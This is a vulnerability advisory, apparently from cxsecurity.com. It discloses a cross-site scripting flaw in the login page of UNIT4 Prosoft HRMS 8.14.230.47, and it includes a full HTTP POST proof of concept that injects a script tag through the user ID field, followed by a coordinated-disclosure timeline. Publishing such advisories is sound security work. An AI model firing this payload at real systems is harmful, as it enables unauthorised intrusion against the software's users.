UNIT4 Prosoft HRMS 8.14.230.47 Cross Site Scripting

2015.02.14
Credit: Jerold Hoong & Edric Teo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Vulnerability type: Cross-site Scripting # Vendor: http://www.unit4.com/ # Product: UNIT4 Prosoft HRMS # Product site: http://www.unit4apac.com/products/prosofthrms # Affected version: 8.14.230.47 # Fixed version: 8.14.330.43 # Credit: Jerold Hoong & Edric Teo # PROOF OF CONCEPT The login page of UNIT4's Prosoft HRMS is vulnerable to cross-site scripting. POST /Login.aspx?ReturnUrl=%2fCommon%2fBroadcastMessageDisplay.aspx%3fUrlReferrerCode %3d&UrlReferrerCode HTTP/1.1 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cookie: ASP.NET_SessionId=teuq5d45e53ecg45mzptyv55 Host: 127.0.0.1 Content-Length: 1276 Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-SG __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMjAyNzEwNDEyOQ9kFgQCAQ9 kFgICAQ8WAh4EVGV4dAVfPGxpbmsgcmVsPSJTSE9SVENVVCBJQ09OIiBocmVmPSJBcHBfVGhlbWVzL1BTRGV mYXVsdC9JbWFnZXMvRmF2SWNvbi5pY28iIHR5cGU9ImltYWdlL3gtaWNvbiIgLz5kAgMPZBYKAgEPZBYCAgMP DxYCHgdWaXNpYmxlaGRkAgMPZBYCZg8PFgIfAAU0VGhlIGNvZGUgY29udGFpbnMgaW52YWxpZCBjaGFyYWN 0ZXJzLiAoVVNSLlVzZXJDb2RlKWRkAgUPDxYCHwAFBlY4IFVBVGRkAgcPZBYWAgEPZBYEAgEPDxYCHwAFC0 NsaWVudCBDb2RlZGQCBQ8PFgIeDEVycm9yTWVzc2FnZQUIUmVxdWlyZWRkZAIDD2QWBAIBDw8WAh8ABQ ZTZXJ2ZXJkZAIDDxBkZBYAZAIFD2QWBAIBDw8WAh8ABQhEYXRhYmFzZWRkAgUPDxYCHwIFCFJlcXVpcmV kZGQCBw9kFgQCAQ8PFgIfAAULTERBUCBEb21haW5kZAIDDxBkZBYAZAIJDw8WAh8ABQdVc2VyIElEZGQCCw 8PZBYCHgxhdXRvY29tcGxldGUFA29mZmQCDQ8PFgIfAgUIUmVxdWlyZWRkZAIPDw8WAh8ABQhQYXNzd29yZ GRkAhMPDxYCHwFoZBYEAgEPDxYCHwAFCExhbmd1YWdlZGQCAw8QZGQWAGQCFQ8PFgIfAAUVRm9yZ290I HlvdXIgcGFzc3dvcmQ%2FZGQCFw8PFgYfAAUHU2lnbiBJbh4EXyFTQgKAAh4FV2lkdGgbAAAAAADAUkABAAAA ZGQCCw9kFgJmD2QWBAIDDxYCHwAFQkNvcHlyaWdodCDCqSAyMDExIFVOSVQ0IEFzaWEgUGFjaWZpYyBQd GUgTHRkLiBBbGwgUmlnaHRzIFJlc2VydmVkLmQCBQ8WAh8ABRNWZXJzaW9uIDguMTQuMzMwLjQzZGSwnj3 yxmGDZ9jR0wKr5HZldmVj4w%3D%3D&__EVENTVALIDATION=%2FwEWBQLctJOuBALT8dy8BQK1qbSRCwL WxaLXDALD94uUBwZOBjPAY1F7DZ4L5a8tZ4BpX9CW&txtUserID=%22%3E%3Cscript%3Ealert%281%29%3B%3 C%2Fscript%3E&txtPassword=&btnSignIn=Sign+In # TIMELINE 28/10/2014: Vulnerability found 04/11/2014: Vendor informed 04/11/2014: Vendor responded 30/11/2014: Vendor fixed the issue 14/02/2015: Public disclosure


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top